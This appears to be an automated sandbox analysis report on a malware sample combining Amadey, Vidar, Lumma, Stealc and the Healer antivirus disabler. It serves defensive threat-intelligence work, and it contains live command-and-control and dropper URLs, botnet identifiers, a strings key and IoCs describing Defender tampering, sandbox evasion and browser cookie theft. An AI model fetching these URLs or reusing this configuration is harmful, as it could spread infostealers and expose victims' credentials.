amadey | 7b5bd878343c3cecaee575c5046401e677127e53682f1894067af020d3bab1fa

Analysis

max time kernel
26s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
29/03/2025, 13:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

938KB
MD5

ed19338ae7b4f14a6300a82555194914
SHA1

c4b17e900215a704197817f8d419b40a07d687e8
SHA256

7b5bd878343c3cecaee575c5046401e677127e53682f1894067af020d3bab1fa
SHA512

64fc35627f5790aa025d05515e8b353ed7825f0cfaf975304933d33b219ccbf7e8e41f9f83152a0a8315568b5195dbbb669d446f6a58f5d3f3a9b9937d16ddca
SSDEEP

24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0hu:9TvC/MTQYxsWR7a0h

Score

10^/10

amadey healer lumma stealc vidar 092155 11373d37b176b52c098f600f61cdf190 928af183c2a2807a3c0526e8c0c9369d trump credential_access defense_evasion discovery dropper execution exploit persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Version

13.3

Botnet

11373d37b176b52c098f600f61cdf190

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

lumma

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://apixtreev.run/LkaUz

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://cosmosyf.top/GOsznj

https://triplooqp.world/APowko

https://wxayfarer.live/ALosnz

https://70oreheatq.live/gsopp

https://0castmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 38 IoCs

stealer

resource	yara_rule
behavioral2/memory/1596-96-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-95-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-103-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-104-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-109-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-110-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-113-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-117-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-122-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-118-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-140-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-156-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-508-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-526-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-523-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-507-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-530-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-638-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-641-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-764-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-763-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-797-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-878-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-1007-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-1010-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-1012-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-1015-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-1033-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-1065-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-1066-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-1067-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-1072-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-1073-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-1076-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-1079-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/1596-1087-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-1102-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5972-1122-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/5336-1978-0x0000000000430000-0x0000000000866000-memory.dmp	healer
behavioral2/memory/5336-1979-0x0000000000430000-0x0000000000866000-memory.dmp	healer
behavioral2/memory/5336-2574-0x0000000000430000-0x0000000000866000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	4612	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4612	powershell.exe
4404	powershell.exe
1408	powershell.exe
4016	powershell.exe
4864	powershell.exe
18124	powershell.exe
5756	powershell.exe
5888	powershell.exe
4988	PowerShell.exe
184	powershell.exe
5024	powershell.exe
3952	powershell.exe
1656	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 1 IoCs

flow	pid	Process
23	4612	powershell.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5660	icacls.exe
2932	takeown.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 30 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2980	chrome.exe
12960	chrome.exe
19528	msedge.exe
8952	chrome.exe
8948	chrome.exe
18988	chrome.exe
4708	chrome.exe
3172	chrome.exe
5032	chrome.exe
4528	chrome.exe
3216	chrome.exe
25484	msedge.exe
25524	msedge.exe
4600	msedge.exe
5096	chrome.exe
3556	chrome.exe
5500	msedge.exe
3240	msedge.exe
1984	msedge.exe
12544	chrome.exe
25336	msedge.exe
2824	chrome.exe
6128	msedge.exe
13100	chrome.exe
7744	chrome.exe
4740	chrome.exe
2464	msedge.exe
4092	chrome.exe
5932	chrome.exe
12968	chrome.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	apple.exe

Executes dropped EXE 8 IoCs

pid	Process
4192	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
408	rapes.exe
1228	apple.exe
2608	22.exe
832	22.exe
4848	hYjiwV0.exe
5840	amnew.exe
1956	futors.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5660	icacls.exe
2932	takeown.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0004000000023620-494.dat	autoit_exe
behavioral2/files/0x00110000000242b3-1579.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4192	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
408	rapes.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4848 set thread context of 1596	4848	hYjiwV0.exe	175

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1840	sc.exe
1608	sc.exe
1692	sc.exe
3668	sc.exe
1748	sc.exe
2524	sc.exe
5492	sc.exe
624	sc.exe
5212	sc.exe
1344	sc.exe
1776	sc.exe
4424	sc.exe
5796	sc.exe
5284	sc.exe
1272	sc.exe
2504	sc.exe
3112	sc.exe
3476	sc.exe
5428	sc.exe
6084	sc.exe
5316	sc.exe
5804	sc.exe
5744	sc.exe
5348	sc.exe
2744	sc.exe
6092	sc.exe
1376	sc.exe
5860	sc.exe
1928	sc.exe
1476	sc.exe
1152	sc.exe
5256	sc.exe
5504	sc.exe
2604	sc.exe
4616	sc.exe
6016	sc.exe
5976	sc.exe
1068	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
12568	9756	WerFault.exe	376
21012	1068	WerFault.exe	369
26008	3724	WerFault.exe	371
26284	26368	WerFault.exe	418
18932	26436	WerFault.exe	431
20168	17052	WerFault.exe	477
20108	16992	WerFault.exe	478

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
1612	timeout.exe
2604	timeout.exe
2040	timeout.exe
5312	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
5816	taskkill.exe
2692	taskkill.exe
5212	taskkill.exe
5980	taskkill.exe
3696	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
1912	reg.exe
1188	reg.exe
2264	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5476	schtasks.exe
3220	schtasks.exe
5780	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4612	powershell.exe
4612	powershell.exe
4192	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
4192	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
408	rapes.exe
408	rapes.exe
1596	MSBuild.exe
1596	MSBuild.exe
1596	MSBuild.exe
1596	MSBuild.exe
4708	chrome.exe
4708	chrome.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
4504	random.exe
4504	random.exe
4504	random.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4504	random.exe
4504	random.exe
4504	random.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4504 wrote to memory of 2364	4504	random.exe	87
PID 4504 wrote to memory of 2364	4504	random.exe	87
PID 4504 wrote to memory of 2364	4504	random.exe	87
PID 4504 wrote to memory of 5896	4504	random.exe	88
PID 4504 wrote to memory of 5896	4504	random.exe	88
PID 4504 wrote to memory of 5896	4504	random.exe	88
PID 2364 wrote to memory of 5476	2364	cmd.exe	91
PID 2364 wrote to memory of 5476	2364	cmd.exe	91
PID 2364 wrote to memory of 5476	2364	cmd.exe	91
PID 5896 wrote to memory of 4612	5896	mshta.exe	94
PID 5896 wrote to memory of 4612	5896	mshta.exe	94
PID 5896 wrote to memory of 4612	5896	mshta.exe	94
PID 4612 wrote to memory of 4192	4612	powershell.exe	98
PID 4612 wrote to memory of 4192	4612	powershell.exe	98
PID 4612 wrote to memory of 4192	4612	powershell.exe	98
PID 4192 wrote to memory of 408	4192	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE	101
PID 4192 wrote to memory of 408	4192	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE	101
PID 4192 wrote to memory of 408	4192	TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE	101
PID 408 wrote to memory of 1228	408	rapes.exe	105
PID 408 wrote to memory of 1228	408	rapes.exe	105
PID 408 wrote to memory of 1228	408	rapes.exe	105
PID 1228 wrote to memory of 2608	1228	apple.exe	106
PID 1228 wrote to memory of 2608	1228	apple.exe	106
PID 1228 wrote to memory of 2608	1228	apple.exe	106
PID 2608 wrote to memory of 1408	2608	22.exe	217
PID 2608 wrote to memory of 1408	2608	22.exe	217
PID 1408 wrote to memory of 832	1408	cmd.exe	110
PID 1408 wrote to memory of 832	1408	cmd.exe	110
PID 1408 wrote to memory of 832	1408	cmd.exe	110
PID 832 wrote to memory of 2688	832	22.exe	111
PID 832 wrote to memory of 2688	832	22.exe	111
PID 2688 wrote to memory of 1476	2688	cmd.exe	113
PID 2688 wrote to memory of 1476	2688	cmd.exe	113
PID 2688 wrote to memory of 624	2688	cmd.exe	114
PID 2688 wrote to memory of 624	2688	cmd.exe	114
PID 2688 wrote to memory of 1612	2688	cmd.exe	235
PID 2688 wrote to memory of 1612	2688	cmd.exe	235
PID 2688 wrote to memory of 1068	2688	cmd.exe	116
PID 2688 wrote to memory of 1068	2688	cmd.exe	116
PID 2688 wrote to memory of 3112	2688	cmd.exe	117
PID 2688 wrote to memory of 3112	2688	cmd.exe	117
PID 2688 wrote to memory of 2932	2688	cmd.exe	118
PID 2688 wrote to memory of 2932	2688	cmd.exe	118
PID 2688 wrote to memory of 5660	2688	cmd.exe	234
PID 2688 wrote to memory of 5660	2688	cmd.exe	234
PID 2688 wrote to memory of 2524	2688	cmd.exe	120
PID 2688 wrote to memory of 2524	2688	cmd.exe	120
PID 2688 wrote to memory of 1840	2688	cmd.exe	121
PID 2688 wrote to memory of 1840	2688	cmd.exe	121
PID 2688 wrote to memory of 2960	2688	cmd.exe	122
PID 2688 wrote to memory of 2960	2688	cmd.exe	122
PID 2688 wrote to memory of 1928	2688	cmd.exe	123
PID 2688 wrote to memory of 1928	2688	cmd.exe	123
PID 2688 wrote to memory of 5744	2688	cmd.exe	124
PID 2688 wrote to memory of 5744	2688	cmd.exe	124
PID 2688 wrote to memory of 5956	2688	cmd.exe	125
PID 2688 wrote to memory of 5956	2688	cmd.exe	125
PID 2688 wrote to memory of 2504	2688	cmd.exe	126
PID 2688 wrote to memory of 2504	2688	cmd.exe	126
PID 2688 wrote to memory of 5796	2688	cmd.exe	127
PID 2688 wrote to memory of 5796	2688	cmd.exe	127
PID 2688 wrote to memory of 4560	2688	cmd.exe	128
PID 2688 wrote to memory of 4560	2688	cmd.exe	128
PID 2688 wrote to memory of 2604	2688	cmd.exe	205

